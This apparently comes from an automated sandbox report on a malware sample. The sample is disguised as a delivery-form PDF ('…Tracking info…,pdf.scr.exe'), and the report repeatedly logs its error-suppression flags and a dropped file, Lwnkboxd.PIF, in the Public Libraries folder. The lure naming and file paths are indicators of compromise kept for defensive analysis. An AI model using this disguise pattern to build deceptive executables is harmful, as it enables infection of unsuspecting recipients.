                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
